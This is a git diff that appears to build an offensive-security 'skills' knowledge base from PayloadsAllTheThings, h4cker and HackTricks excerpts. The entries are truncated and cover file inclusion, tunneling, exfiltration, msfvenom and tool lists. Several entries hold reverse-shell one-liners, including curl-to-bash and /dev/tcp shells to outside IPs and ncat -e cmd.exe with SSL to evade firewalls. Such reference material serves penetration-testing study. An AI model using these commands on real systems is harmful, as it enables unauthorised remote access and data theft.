+ "- [ARTi-C2 - A Post-Exploitation Framework Used To Execute Atomic Red Team Test Cases With Rapid Payload Deployment And Execution Capabilities Via .NET's DLR](http://feedproxy.google.com/~r/PentestTools/~3/ggRqmB7raNY/arti-c2-post-exploitation-framework.html)",
+ "- [ATFuzzer - Dynamic Analysis Of AT Interface For Android Smartphones](http://feedproxy.google.com/~r/PentestTools/~3/OL4U89ASYkU/atfuzzer-dynamic-analysis-of-at.html)",
+ "- [Aclpwn.Py - Active Directory ACL Exploitation With BloodHound](http://feedproxy.google.com/~r/PentestTools/~3/d4MkUiImWAg/aclpwnpy-active-directory-acl.html)",
+ "- [Airopy - Get Clients And Access Points](http://feedproxy.google.com/~r/PentestTools/~3/_2hr62fH7Rc/airopy-get-clients-and-access-points.html)",
+ "- [AlanFramework - A Post-Exploitation Framework](http://feedproxy.google.com/~r/PentestTools/~3/e7e0GVr9NqM/alanframework-post-exploitation.html)",
+ "- [Applepie - A Hypervisor For Fuzzing Built With WHVP And Bochs](http://feedproxy.google.com/~r/PentestTools/~3/U7xXM25iB_M/applepie-hypervisor-for-fuzzing-built.html)",
+ "- [Auto-Elevate - Escalate From A Low-Integrity Administrator Account To NT AUTHORITY\\SYSTEM Without An LPE Exploit By Combining A COM UAC Bypass And Token Impersonation](http://www.kitploit.com/2022/04/auto-elevate-escalate-from-low.html)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/exploit-development/tools.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/file_inclusion-0ea940c247ae.json b/skills/file_inclusion-0ea940c247ae.json
new file mode 100644
index 0000000..378fd56
--- /dev/null
+++ b/skills/file_inclusion-0ea940c247ae.json
@@ -0,0 +1,27 @@
+{
+ "id": "file_inclusion-0ea940c247ae",
+ "category": "File Inclusion",
+ "title": "LFI to RCE",
+ "description": "# LFI to RCE\n\n> LFI (Local File Inclusion) is a vulnerability that occurs when a web application includes files from the local file system, often due to insecure handling of user input. If an attacker can control the file path, they can potentially include sensitive or dangerous files such as system files (/etc/passwd), configuration files, or even malicious files that could lead to Remote Code Execution (RCE).\n\n## Summary\n\n- [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd)\n- [LFI to RCE via ",
+ "payloads": [
+ "# LFI to RCE",
+ "> LFI (Local File Inclusion) is a vulnerability that occurs when a web application includes files from the local file system, often due to insecure handling of user input. If an attacker can control the file path, they can potentially include sensitive or dangerous files such as system files (/etc/passwd), configuration files, or even malicious files that could lead to Remote Code Execution (RCE).",
+ "## Summary",
+ "- [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd)",
+ "- [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron)",
+ "- [LFI to RCE via iconv](#lfi-to-rce-via-iconv)",
+ "- [LFI to RCE via upload](#lfi-to-rce-via-upload)",
+ "- [LFI to RCE via upload (race)](#lfi-to-rce-via-upload-race)",
+ "- [LFI to RCE via upload (FindFirstFile)](#lfi-to-rce-via-upload-findfirstfile)",
+ "- [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo)",
+ "- [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file)",
+ "- [RCE via SSH](#rce-via-ssh)",
+ "- [RCE via Mail](#rce-via-mail)",
+ "- [RCE via Apache logs](#rce-via-apache-logs)",
+ "- [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions)"
+ ],
+ "source": "PayloadsAllTheThings",
+ "references": [
+ "PayloadsAllTheThings/File Inclusion/LFI-to-RCE.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/file_inclusion-d0b20a50e2e2.json b/skills/file_inclusion-d0b20a50e2e2.json
new file mode 100644
index 0000000..ef90651
--- /dev/null
+++ b/skills/file_inclusion-d0b20a50e2e2.json
@@ -0,0 +1,27 @@
+{
+ "id": "file_inclusion-d0b20a50e2e2",
+ "category": "File Inclusion",
+ "title": "Wrappers",
+ "description": "# Inclusion Using Wrappers\n\nA wrapper in the context of file inclusion vulnerabilities refers to the protocol or method used to access or include a file. Wrappers are often used in PHP or other server-side languages to extend how file inclusion functions, enabling the use of protocols like HTTP, FTP, and others in addition to the local filesystem.\n\n## Summary\n\n- [Wrapper php://filter](#wrapper-phpfilter)\n- [Wrapper data://](#wrapper-data)\n- [Wrapper expect://](#wrapper-expect)\n- [Wrapper input:/",
+ "payloads": [
+ "# Inclusion Using Wrappers",
+ "A wrapper in the context of file inclusion vulnerabilities refers to the protocol or method used to access or include a file. Wrappers are often used in PHP or other server-side languages to extend how file inclusion functions, enabling the use of protocols like HTTP, FTP, and others in addition to the local filesystem.",
+ "## Summary",
+ "- [Wrapper php://filter](#wrapper-phpfilter)",
+ "- [Wrapper data://](#wrapper-data)",
+ "- [Wrapper expect://](#wrapper-expect)",
+ "- [Wrapper input://](#wrapper-input)",
+ "- [Wrapper zip://](#wrapper-zip)",
+ "- [Wrapper phar://](#wrapper-phar)",
+ "- [PHAR Archive Structure](#phar-archive-structure)",
+ "- [PHAR Deserialization](#phar-deserialization)",
+ "- [Wrapper convert.iconv:// and dechunk://](#wrapper-converticonv-and-dechunk)",
+ "- [Leak file content from error-based oracle](#leak-file-content-from-error-based-oracle)",
+ "- [Leak file content inside a custom format output](#leak-file-content-inside-a-custom-format-output)",
+ "- [References](#references)"
+ ],
+ "source": "PayloadsAllTheThings",
+ "references": [
+ "PayloadsAllTheThings/File Inclusion/Wrappers.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/foundational_cybersecurity_concepts_20ecdbdb1ac2.json b/skills/foundational_cybersecurity_concepts_20ecdbdb1ac2.json
new file mode 100644
index 0000000..5f337f6
--- /dev/null
+++ b/skills/foundational_cybersecurity_concepts_20ecdbdb1ac2.json
@@ -0,0 +1,27 @@
+{
+ "id": "foundational_cybersecurity_concepts_20ecdbdb1ac2",
+ "category": "foundational-cybersecurity-concepts",
+ "title": "social eng countermeasures",
+ "description": "# Social Engineering Countermeasures\n\nSocial engineering countermeasures are strategies and practices designed to protect against manipulation and deception techniques used by attackers to exploit human behavior and gain unauthorized access to information or systems. \n\n### 1. **Education and Training**\n\n#### **1.1 Regular Security Awareness Training**\n\n- **Objective:** Educate employees and individuals about social engineering tactics and how to recognize them.\n- **Components:**\n - **Phishing A",
+ "payloads": [
+ "# Social Engineering Countermeasures",
+ "Social engineering countermeasures are strategies and practices designed to protect against manipulation and deception techniques used by attackers to exploit human behavior and gain unauthorized access to information or systems.",
+ "### 1. **Education and Training**",
+ "#### **1.1 Regular Security Awareness Training**",
+ "- **Objective:** Educate employees and individuals about social engineering tactics and how to recognize them.",
+ "- **Components:**",
+ "- **Phishing Awareness:** Train users to identify phishing emails and suspicious links.",
+ "- **Pretexting and Baiting:** Teach how to handle unsolicited requests for sensitive information.",
+ "- **Social Media Safety:** Educate on the risks of oversharing personal information online.",
+ "- **Methods:** Workshops, online courses, and interactive simulations.",
+ "#### **1.2 Simulated Attacks**",
+ "- **Objective:** Test and improve the ability of employees to recognize and respond to social engineering attempts.",
+ "- **Components:**",
+ "- **Phishing Simulations:** Conduct fake phishing campaigns to evaluate and enhance response.",
+ "- **Pretexting Exercises:** Simulate social engineering scenarios to train employees on appropriate responses."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/foundational-cybersecurity-concepts/social_eng_countermeasures.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/foundational_cybersecurity_concepts_5292d866f0af.json b/skills/foundational_cybersecurity_concepts_5292d866f0af.json
new file mode 100644
index 0000000..b966a0e
--- /dev/null
+++ b/skills/foundational_cybersecurity_concepts_5292d866f0af.json
@@ -0,0 +1,27 @@
+{
+ "id": "foundational_cybersecurity_concepts_5292d866f0af",
+ "category": "foundational-cybersecurity-concepts",
+ "title": "Undertanding Information Security Controls",
+ "description": "# Undertanding Information Security Controls\n\nInformation security controls are essential measures designed to protect information assets from various security threats. These controls ensure the confidentiality, integrity, and availability (CIA) of information, which are the core principles of information security.\n\n### **Types of Information Security Controls**\n\nInformation security controls can be broadly categorized into three main types: administrative, physical, and technical controls. Each",
+ "payloads": [
+ "# Undertanding Information Security Controls",
+ "Information security controls are essential measures designed to protect information assets from various security threats. These controls ensure the confidentiality, integrity, and availability (CIA) of information, which are the core principles of information security.",
+ "### **Types of Information Security Controls**",
+ "Information security controls can be broadly categorized into three main types: administrative, physical, and technical controls. Each type serves specific functions and addresses different aspects of security.",
+ "#### **1. Administrative Controls**",
+ "Administrative controls involve the policies, procedures, and guidelines established by an organization to manage and govern its information security. These controls are crucial for setting the tone and framework for security practices within the organization.",
+ "- **Examples**: Security policies, employee training programs, incident response plans, and access control policies.",
+ "- **Functions**: These controls help in managing security risks, ensuring compliance with regulations, and fostering a security-conscious culture within the organization",
+ "#### **2. Physical Controls**",
+ "Physical controls are measures taken to protect the physical infrastructure and hardware that store and process information. These controls are designed to prevent unauthorized physical access to facilities and equipment.",
+ "- **Examples**: Security guards, surveillance cameras, locks, biometric access controls, and secure server rooms.",
+ "- **Functions**: These controls aim to deter, detect, and prevent physical intrusions that could compromise information security",
+ "#### **3. Technical Controls**",
+ "Technical controls, also known as logical controls, involve the use of technology to protect information systems and data. These controls are implemented through hardware and software solutions.",
+ "- **Examples**: Firewalls, antivirus software, encryption, intrusion detection systems, and multi-factor authentication."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/foundational-cybersecurity-concepts/Undertanding Information Security Controls.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/foundational_cybersecurity_concepts_aa5925179130.json b/skills/foundational_cybersecurity_concepts_aa5925179130.json
new file mode 100644
index 0000000..03dad72
--- /dev/null
+++ b/skills/foundational_cybersecurity_concepts_aa5925179130.json
@@ -0,0 +1,13 @@
+{
+ "id": "foundational_cybersecurity_concepts_aa5925179130",
+ "category": "foundational-cybersecurity-concepts",
+ "title": "cyber laws",
+ "description": "See https://github.com/The-Art-of-Hacking/h4cker/tree/master/regulations\n",
+ "payloads": [
+ "See https://github.com/The-Art-of-Hacking/h4cker/tree/master/regulations"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/foundational-cybersecurity-concepts/cyber_laws.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/game_hacking_3715525a1018.json b/skills/game_hacking_3715525a1018.json
new file mode 100644
index 0000000..f26f086
--- /dev/null
+++ b/skills/game_hacking_3715525a1018.json
@@ -0,0 +1,17 @@
+{
+ "id": "game_hacking_3715525a1018",
+ "category": "game-hacking",
+ "title": "tools",
+ "description": "# Game Hacking Tools\n\nThis is a curated list of tools for this category.\n\n---\n\n- [AntiCheat-Testing-Framework - Framework To Test Any Anti-Cheat](http://feedproxy.google.com/~r/PentestTools/~3/MoEg1J7w6pk/anticheat-testing-framework-framework.html)\n- [Cheat Engine - A Development Environment Focused On Modding](http://feedproxy.google.com/~r/PentestTools/~3/hmyT4ewgMO8/cheat-engine-development-environment.html)\n- [Squalr - Squalr Memory Editor - Game Hacking Tool Written In C#](http://feedproxy.",
+ "payloads": [
+ "# Game Hacking Tools",
+ "This is a curated list of tools for this category.",
+ "- [AntiCheat-Testing-Framework - Framework To Test Any Anti-Cheat](http://feedproxy.google.com/~r/PentestTools/~3/MoEg1J7w6pk/anticheat-testing-framework-framework.html)",
+ "- [Cheat Engine - A Development Environment Focused On Modding](http://feedproxy.google.com/~r/PentestTools/~3/hmyT4ewgMO8/cheat-engine-development-environment.html)",
+ "- [Squalr - Squalr Memory Editor - Game Hacking Tool Written In C#](http://feedproxy.google.com/~r/PentestTools/~3/fYMboqEG5pk/squalr-squalr-memory-editor-game.html)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/game-hacking/tools.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/generic_hacking_4e77dddfd885.json b/skills/generic_hacking_4e77dddfd885.json
new file mode 100644
index 0000000..471923f
--- /dev/null
+++ b/skills/generic_hacking_4e77dddfd885.json
@@ -0,0 +1,27 @@
+{
+ "id": "generic_hacking_4e77dddfd885",
+ "category": "generic-hacking",
+ "title": "brute force",
+ "description": "# Brute Force - CheatSheet\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Default Credentials\n\n**Search in google** for default credentials of the technology that is being used, or **try these links**:\n\n- [**https://github.com/ihebski/DefaultCreds-cheat-sheet**](https://github.com/ihebski/DefaultCreds-cheat-sheet)\n- [**http://www.phenoelit.org/dpl/dpl.html**](http://www.phenoelit.org/dpl/dpl.html)\n- [**http://www.vulnerabilityassessment.co.uk/passwordsC.htm**](http://www.vulnerabilityassess",
+ "payloads": [
+ "# Brute Force - CheatSheet",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Default Credentials",
+ "**Search in google** for default credentials of the technology that is being used, or **try these links**:",
+ "- [**https://github.com/ihebski/DefaultCreds-cheat-sheet**](https://github.com/ihebski/DefaultCreds-cheat-sheet)",
+ "- [**http://www.phenoelit.org/dpl/dpl.html**](http://www.phenoelit.org/dpl/dpl.html)",
+ "- [**http://www.vulnerabilityassessment.co.uk/passwordsC.htm**](http://www.vulnerabilityassessment.co.uk/passwordsC.htm)",
+ "- [**https://192-168-1-1ip.mobi/default-router-passwords-list/**](https://192-168-1-1ip.mobi/default-router-passwords-list/)",
+ "- [**https://datarecovery.com/rd/default-passwords/**](https://datarecovery.com/rd/default-passwords/)",
+ "- [**https://bizuns.com/default-passwords-list**](https://bizuns.com/default-passwords-list)",
+ "- [**https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv**](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv)",
+ "- [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium)",
+ "- [**https://www.cirt.net/passwords**](https://www.cirt.net/passwords)",
+ "- [**http://www.passwordsdatabase.com/**](http://www.passwordsdatabase.com)",
+ "- [**https://many-passwords.github.io/**](https://many-passwords.github.io)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/generic-hacking/brute-force.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/generic_hacking_69b445e769b9.json b/skills/generic_hacking_69b445e769b9.json
new file mode 100644
index 0000000..61ca4d5
--- /dev/null
+++ b/skills/generic_hacking_69b445e769b9.json
@@ -0,0 +1,27 @@
+{
+ "id": "generic_hacking_69b445e769b9",
+ "category": "generic-hacking",
+ "title": "full ttys",
+ "description": "# Full TTYs\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Full TTY\n\nNote that the shell you set in the `SHELL` variable **must** be **listed inside** _**/etc/shells**_ or `The value for the SHELL variable was not found in the /etc/shells file This incident has been reported`. Also, note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running `bash`.\n\n#### Python\n\n```bash\npython3 -c 'import pty; pty.spawn(\"/bin/bash\")'\n\n(inside",
+ "payloads": [
+ "# Full TTYs",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Full TTY",
+ "Note that the shell you set in the `SHELL` variable **must** be **listed inside** _**/etc/shells**_ or `The value for the SHELL variable was not found in the /etc/shells file This incident has been reported`. Also, note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running `bash`.",
+ "#### Python",
+ "```bash",
+ "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'",
+ "(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;",
+ "> [!TIP]",
+ "> You can get the **number** of **rows** and **columns** executing **`stty -a`**",
+ "#### script",
+ "```bash",
+ "script /dev/null -qc /bin/bash #/dev/null is to not store anything",
+ "(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;",
+ "#### socat"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/generic-hacking/reverse-shells/full-ttys.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/generic_hacking_76ffdfff9621.json b/skills/generic_hacking_76ffdfff9621.json
new file mode 100644
index 0000000..9d28ec3
--- /dev/null
+++ b/skills/generic_hacking_76ffdfff9621.json
@@ -0,0 +1,27 @@
+{
+ "id": "generic_hacking_76ffdfff9621",
+ "category": "generic-hacking",
+ "title": "archive extraction path traversal",
+ "description": "# Archive Extraction Path Traversal (\"Zip-Slip\" / WinRAR CVE-2025-8088)\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Overview\n\nMany archive formats (ZIP, RAR, TAR, 7-ZIP, etc.) allow each entry to carry its own **internal path**. When an extraction utility blindly honours that path, a crafted filename containing `..` or an **absolute path** (e.g. `C:\\Windows\\System32\\`) will be written outside of the user-chosen directory. \nThis class of vulnerability is widely known as *Zip-Slip* or **a",
+ "payloads": [
+ "# Archive Extraction Path Traversal (\"Zip-Slip\" / WinRAR CVE-2025-8088)",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Overview",
+ "Many archive formats (ZIP, RAR, TAR, 7-ZIP, etc.) allow each entry to carry its own **internal path**. When an extraction utility blindly honours that path, a crafted filename containing `..` or an **absolute path** (e.g. `C:\\Windows\\System32\\`) will be written outside of the user-chosen directory.",
+ "This class of vulnerability is widely known as *Zip-Slip* or **archive extraction path traversal**.",
+ "Consequences range from overwriting arbitrary files to directly achieving **remote code execution (RCE)** by dropping a payload in an **auto-run** location such as the Windows *Startup* folder.",
+ "## Root Cause",
+ "1. Attacker creates an archive where one or more file headers contain:",
+ "* Relative traversal sequences (`..\\..\\..\\Users\\\\victim\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\payload.exe`)",
+ "* Absolute paths (`C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\payload.exe`)",
+ "* Or crafted **symlinks** that resolve outside the target dir (common in ZIP/TAR on *nix*).",
+ "2. Victim extracts the archive with a vulnerable tool that trusts the embedded path (or follows symlinks) instead of sanitising it or forcing extraction beneath the chosen directory.",
+ "3. The file is written in the attacker-controlled location and executed/loaded next time the system or user triggers that path.",
+ "## Real-World Example \u2013 WinRAR \u2264 7.12 (CVE-2025-8088)",
+ "WinRAR for Windows (including the `rar` / `unrar` CLI, the DLL and the portable source) failed to validate filenames during extraction."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/generic-hacking/archive-extraction-path-traversal.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/generic_hacking_8634f06570d3.json b/skills/generic_hacking_8634f06570d3.json
new file mode 100644
index 0000000..ded67f1
--- /dev/null
+++ b/skills/generic_hacking_8634f06570d3.json
@@ -0,0 +1,27 @@
+{
+ "id": "generic_hacking_8634f06570d3",
+ "category": "generic-hacking",
+ "title": "windows",
+ "description": "# Shells - Windows\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Lolbas\n\nThe page [lolbas-project.github.io](https://lolbas-project.github.io/) is for Windows like [https://gtfobins.github.io/](https://gtfobins.github.io/) is for linux.\\\nObviously, **there aren't SUID files or sudo privileges in Windows**, but it's useful to know **how** some **binaries** can be (ab)used to perform some kind of unexpected actions like **execute arbitrary code.**\n\n## NC\n\n```bash\nnc.exe -e cmd.exe ",
+ "## NCAT",
+ "victim",
+ "ncat.exe -e \"cmd.exe /c (cmd.exe 2>&1)\"",
+ "#Encryption to bypass firewall",
+ "ncat.exe --ssl -e \"cmd.exe /c (cmd.exe 2>&1)\"",
+ "attacker",
+ "ncat -l ",
+ "#Encryption to bypass firewall"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/generic-hacking/reverse-shells/windows.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/generic_hacking_bef8d53eea77.json b/skills/generic_hacking_bef8d53eea77.json
new file mode 100644
index 0000000..944c25c
--- /dev/null
+++ b/skills/generic_hacking_bef8d53eea77.json
@@ -0,0 +1,27 @@
+{
+ "id": "generic_hacking_bef8d53eea77",
+ "category": "generic-hacking",
+ "title": "msfvenom",
+ "description": "# MSFVenom - CheatSheet\n\n{{#include ../../banners/hacktricks-training.md}}\n\n---\n\n## Basic msfvenom\n\n`msfvenom -p -e -f -i LHOST=`\n\nOne can also use the `-a` to specify the architecture or the `--platform`\n\n## Listing\n\n```bash\nmsfvenom -l payloads #Payloads\nmsfvenom -l encoders #Encoders\n```\n\n## Common params when creating a shellcode\n\n```bash\n-b \"\\x00\\x0a\\x0d\"\n-f c\n-e x86/shikata_ga_nai -i 5\nEXITFUNC=thread\nPrependSetuid=True #Use this to create a ",
+ "payloads": [
+ "# MSFVenom - CheatSheet",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic msfvenom",
+ "`msfvenom -p -e -f -i LHOST=`",
+ "One can also use the `-a` to specify the architecture or the `--platform`",
+ "## Listing",
+ "```bash",
+ "msfvenom -l payloads #Payloads",
+ "msfvenom -l encoders #Encoders",
+ "## Common params when creating a shellcode",
+ "```bash",
+ "-b \"\\x00\\x0a\\x0d\"",
+ "-e x86/shikata_ga_nai -i 5",
+ "EXITFUNC=thread",
+ "PrependSetuid=True #Use this to create a shellcode that will execute something with SUID"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/generic-hacking/reverse-shells/msfvenom.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/generic_hacking_e3860554f097.json b/skills/generic_hacking_e3860554f097.json
new file mode 100644
index 0000000..67d9990
--- /dev/null
+++ b/skills/generic_hacking_e3860554f097.json
@@ -0,0 +1,27 @@
+{
+ "id": "generic_hacking_e3860554f097",
+ "category": "generic-hacking",
+ "title": "linux",
+ "description": "# Shells - Linux\n\n{{#include ../../banners/hacktricks-training.md}}\n\n**If you have questions about any of these shells you could check them with** [**https://explainshell.com/**](https://explainshell.com)\n\n## Full TTY\n\n**Once you get a reverse shell**[ **read this page to obtain a full TTY**](full-ttys.md)**.**\n\n## Bash | sh\n\n```bash\ncurl https://reverse-shell.sh/1.1.1.1:3000 | bash\nbash -i >& /dev/tcp// 0>&1\nbash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP\n0<&196;exec 196<>/dev/t",
+ "payloads": [
+ "# Shells - Linux",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "**If you have questions about any of these shells you could check them with** [**https://explainshell.com/**](https://explainshell.com)",
+ "## Full TTY",
+ "**Once you get a reverse shell**[ **read this page to obtain a full TTY**](full-ttys.md)**.**",
+ "## Bash | sh",
+ "```bash",
+ "curl https://reverse-shell.sh/1.1.1.1:3000 | bash",
+ "bash -i >& /dev/tcp// 0>&1",
+ "bash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP",
+ "0<&196;exec 196<>/dev/tcp//; sh <&196 >&196 2>&196",
+ "exec 5<>/dev/tcp//; while read line 0<&5; do $line 2>&5 >&5; done",
+ "#Short and bypass (credits to Dikline)",
+ "(sh)0>/dev/tcp/10.10.10.10/9091",
+ "#after getting the previous shell to get the output to execute"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/generic-hacking/reverse-shells/linux.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/generic_hacking_e9aa25da055c.json b/skills/generic_hacking_e9aa25da055c.json
new file mode 100644
index 0000000..bc58597
--- /dev/null
+++ b/skills/generic_hacking_e9aa25da055c.json
@@ -0,0 +1,27 @@
+{
+ "id": "generic_hacking_e9aa25da055c",
+ "category": "generic-hacking",
+ "title": "tunneling and port forwarding",
+ "description": "# Tunneling and Port Forwarding\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Nmap tip\n\n> [!WARNING]\n> **ICMP** and **SYN** scans cannot be tunnelled through socks proxies, so we must **disable ping discovery** (`-Pn`) and specify **TCP scans** (`-sT`) for this to work.\n\n## **Bash**\n\n**Host -> Jump -> InternalA -> InternalB**\n\n```bash\n# On the jump server connect the port 3333 to the 5985\nmknod backpipe p;\nnc -lvnp 5985 0backpipe\n\n# On InternalA accessible from ",
+ "payloads": [
+ "# Tunneling and Port Forwarding",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Nmap tip",
+ "> [!WARNING]",
+ "> **ICMP** and **SYN** scans cannot be tunnelled through socks proxies, so we must **disable ping discovery** (`-Pn`) and specify **TCP scans** (`-sT`) for this to work.",
+ "## **Bash**",
+ "**Host -> Jump -> InternalA -> InternalB**",
+ "```bash",
+ "# On the jump server connect the port 3333 to the 5985",
+ "mknod backpipe p;",
+ "nc -lvnp 5985 0backpipe",
+ "# On InternalA accessible from Jump and can access InternalB",
+ "## Expose port 3333 and connect it to the winrm port of InternalB",
+ "exec 3<>/dev/tcp/internalB/5985",
+ "exec 4<>/dev/tcp/Jump/3333"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/generic-hacking/tunneling-and-port-forwarding.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/generic_hacking_ea2354ed0e74.json b/skills/generic_hacking_ea2354ed0e74.json
new file mode 100644
index 0000000..7a0d5ad
--- /dev/null
+++ b/skills/generic_hacking_ea2354ed0e74.json
@@ -0,0 +1,27 @@
+{
+ "id": "generic_hacking_ea2354ed0e74",
+ "category": "generic-hacking",
+ "title": "exfiltration",
+ "description": "# Exfiltration\n\n{{#include ../banners/hacktricks-training.md}}\n\n> [!TIP]\n> For an end-to-end example of staging loot in `C:\\Users\\Public` and exfiltrating it with Rclone to mimic legitimate backups, review the workflow below.\n\n{{#ref}}\n../windows-hardening/windows-local-privilege-escalation/dll-hijacking/advanced-html-staged-dll-sideloading.md\n{{#endref}}\n\n## Commonly whitelisted domains to exfiltrate information\n\nCheck [https://lots-project.com/](https://lots-project.com/) to find commonly whit",
+ "payloads": [
+ "# Exfiltration",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "> [!TIP]",
+ "> For an end-to-end example of staging loot in `C:\\Users\\Public` and exfiltrating it with Rclone to mimic legitimate backups, review the workflow below.",
+ "{{#ref}}",
+ "../windows-hardening/windows-local-privilege-escalation/dll-hijacking/advanced-html-staged-dll-sideloading.md",
+ "{{#endref}}",
+ "## Commonly whitelisted domains to exfiltrate information",
+ "Check [https://lots-project.com/](https://lots-project.com/) to find commonly whitelisted domains that can be abused",
+ "## Copy\\&Paste Base64",
+ "**Linux**",
+ "```bash",
+ "base64 -w0 #Encode file",
+ "base64 -d file #Decode file",
+ "**Windows**"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/generic-hacking/exfiltration.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/generic_hacking_ead55584ab99.json b/skills/generic_hacking_ead55584ab99.json
new file mode 100644
index 0000000..d190989
--- /dev/null
+++ b/skills/generic_hacking_ead55584ab99.json
@@ -0,0 +1,27 @@
+{
+ "id": "generic_hacking_ead55584ab99",
+ "category": "generic-hacking",
+ "title": "expose local to the internet",
+ "description": "# Expose local to the internet\n\n{{#include ../../banners/hacktricks-training.md}}\n\n**The goal of this page is to propose alternatives that allow AT LEAST to expose local raw TCP ports and local webs (HTTP) to the internet WITHOUT needing to install anything in the other server (only in local if needed).**\n\n## **Serveo**\n\nFrom [https://serveo.net/](https://serveo.net/), it allows several http and port forwarding features **for free**.\n\n```bash\n# Get a random port from serveo.net to expose local p",
+ "payloads": [
+ "# Expose local to the internet",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "**The goal of this page is to propose alternatives that allow AT LEAST to expose local raw TCP ports and local webs (HTTP) to the internet WITHOUT needing to install anything in the other server (only in local if needed).**",
+ "## **Serveo**",
+ "From [https://serveo.net/](https://serveo.net/), it allows several http and port forwarding features **for free**.",
+ "```bash",
+ "# Get a random port from serveo.net to expose local port 4444",
+ "ssh -R 0:localhost:4444 serveo.net",
+ "# Expose a web listening in localhost:300 in a random https URL",
+ "ssh -R 80:localhost:3000 serveo.net",
+ "## SocketXP",
+ "From [https://www.socketxp.com/download](https://www.socketxp.com/download), it allows to expose tcp and http:",
+ "```bash",
+ "# Expose tcp port 22",
+ "socketxp connect tcp://localhost:22"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/generic-hacking/reverse-shells/expose-local-to-the-internet.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/generic_hacking_ed43db3c791c.json b/skills/generic_hacking_ed43db3c791c.json
new file mode 100644
index 0000000..e43e8dd
--- /dev/null
+++ b/skills/generic_hacking_ed43db3c791c.json
@@ -0,0 +1,27 @@
+{
+ "id": "generic_hacking_ed43db3c791c",
+ "category": "generic-hacking",
+ "title": "search exploits",
+ "description": "# Search Exploits\n\n{{#include ../banners/hacktricks-training.md}}\n\n### Browser\n\nAlways search in \"google\" or others: **\\ \\[version] exploit**\n\nYou should also try the **shodan** **exploit search** from [https://exploits.shodan.io/](https://exploits.shodan.io).\n\n### Searchsploit\n\nUseful to search exploits for services in **exploitdb from the console.**\n\n```bash\n#Searchsploit tricks\nsearchsploit \"linux Kernel\" #Example\nsearchsploit apache mod_ssl #Other example\nsearchsploit -m 7618 #",
+ "payloads": [
+ "# Search Exploits",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "### Browser",
+ "Always search in \"google\" or others: **\\ \\[version] exploit**",
+ "You should also try the **shodan** **exploit search** from [https://exploits.shodan.io/](https://exploits.shodan.io).",
+ "### Searchsploit",
+ "Useful to search exploits for services in **exploitdb from the console.**",
+ "```bash",
+ "#Searchsploit tricks",
+ "searchsploit \"linux Kernel\" #Example",
